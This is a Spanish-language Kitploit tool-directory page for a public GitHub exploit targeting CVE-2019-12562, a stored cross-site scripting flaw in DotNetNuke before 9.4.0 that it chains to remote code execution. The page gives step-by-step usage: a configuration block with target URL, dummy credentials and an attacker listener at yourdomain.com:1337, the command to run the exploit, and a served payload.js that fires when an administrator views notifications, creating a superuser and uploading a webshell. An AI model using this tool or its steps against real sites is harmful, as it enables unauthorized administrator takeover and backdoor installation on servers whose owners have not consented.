Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2019-12562 — Cross-Site Scripting Almacenado en DotNetNuke (DNN) Versión anterior a 9.4.0 | XSS a RCE | Kitploit
Herramientas/GitHubGitHub/mayaseven/cve-2019-12562
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónRed Teaming
GitHubmayaseven/cve-2019-12562

CVE-2019-12562

Cross-Site Scripting Almacenado en DotNetNuke (DNN) Versión anterior a 9.4.0 | XSS a RCE

Ver Repositorio
84hace 6 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2019-12562

CVE-2019-12562 Cross-Site Scripting almacenado en DotNetNuke (DNN) versiones anteriores a 9.4.0 permite a atacantes remotos almacenar e incrustar el script malicioso en la página de notificaciones de administración. El exploit podría usarse para realizar cualquier acción con privilegios de administrador, como gestionar contenido, agregar usuarios, subir backdoors al servidor, etc. La explotación exitosa ocurre cuando un usuario administrador visita una página de notificaciones con cross-site scripting almacenado.

Explotación

  • Configura el archivo del exploit
root@kitploit:~
TARGET_URL = "http://targetdomain/DotNetNuke"
USERNAME = "MAYASEVEN"   # At least five characters long
PASSWORD = "P@ssw0rd" # At least 0 non-alphanumeric characters, At least 7 characters
EMAIL = "[email protected]" # Change email to any you want
# A web server for listening an event
LISTEN_URL = "http://yourdomain.com:1337"
  • Ejecuta el exploit; si el objetivo es vulnerable, el exploit registrará un usuario dummy con XSS adjunto en el campo "Display Name" y obtendrás payload.js.
root@kitploit:~
python3 CVE-2019-12562.py
  • Debes servir el servidor web y colocar payload.js en él para esperar la conexión del administrador.
root@kitploit:~
python -m SimpleHTTPServer 1337

Este exploit creará un superusuario y subirá una webshell al servidor objetivo

Condición del exploit: la explotación exitosa ocurre cuando un usuario administrador visita una página de notificaciones.

Leer más: https://mayaseven.com/cve-2019-12562-stored-cross-site-scripting-in-dotnetnuke-dnn-version-v9-3-2/ Referencia CVE: https://www.cvedetails.com/cve/CVE-2019-12562/

Descargar herramienta